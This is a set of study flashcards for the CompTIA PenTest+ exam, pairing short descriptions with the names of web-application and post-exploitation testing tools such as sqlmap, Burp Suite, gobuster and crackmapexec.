13D: Identify Tools Flashcards
3.3 Given a scenario, research attack vectors and perform application-based attacks. 3.6 Given a scenario, perform a social engineering or physical attack. 5.3 Explain use cases of the following tools during the phases of a penetration test.
Git secrets search tool. It can automatically crawl through a repository looking for accidental commits of secrets. GitHub secrets allow code commits, this will allow an attacker to modify code in a repository.
trufflehog
CompTIA definition: Proxy that allows for both automated and manual testing and identification of vulnerabilities. It has many components that allow for different tasks to be performed.
This is a free and open-source web app scanner (similar to Burp)
OWASP ZAP
Proxy with a wide range of options to test web applications for different vulnerabilities. Its components allow you to perform particular types of automated testing, manually modifying requests, and passive analysis.
Burp Suite
Can discover subdomains, directories, and files by brute-forcing from a list of common names. This can provide information that was otherwise not available.
gobuster
Web application brute-force finder for directories and files. Comes with 9 different lists, including default directories and common names given by developers. Also allows forbrute-force.
dirbuster
CompTIA definition: This Web Application Attack and Audit Framework allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting. (included as a tool in Kali, has both a GUI and CLI interface, developed in Python)
w3af
A web application vulnerability scanner which will automatically navigate a webapp looking for areas where it can inject data. Several modules can be enabled/disabled to target different vulnerabilities.
wapiti
Focuses on web browser attacks by assessing the actual security posture of a target by using client-side attack vectors.
beef
Automatically gathers data about a WordPress site and compares findings such as plugins against a database of known vulnerabilities. Provides useful information on findings, including plugin version and references to the vulnerability such as CVE number and link.
wpscan
Static code analysis security tool for Ruby on Rails applications. Checks for vulnerabilities and provides confidence level of finding (high, medium, weak).
brakeman
SQL Injection scanner tool. Automates several of the attacks and supports many databases. Some of its features include database search, enumeration, and command execution.
sqlmap
Exploit finder that allows to search through the information found in Exploit-DB. It also supports Nmap outputs in XML format to search for exploits automatically.
searchsploit
Post-exploitation tool to identify vulnerabilities in active directory environments.
crackmapexec
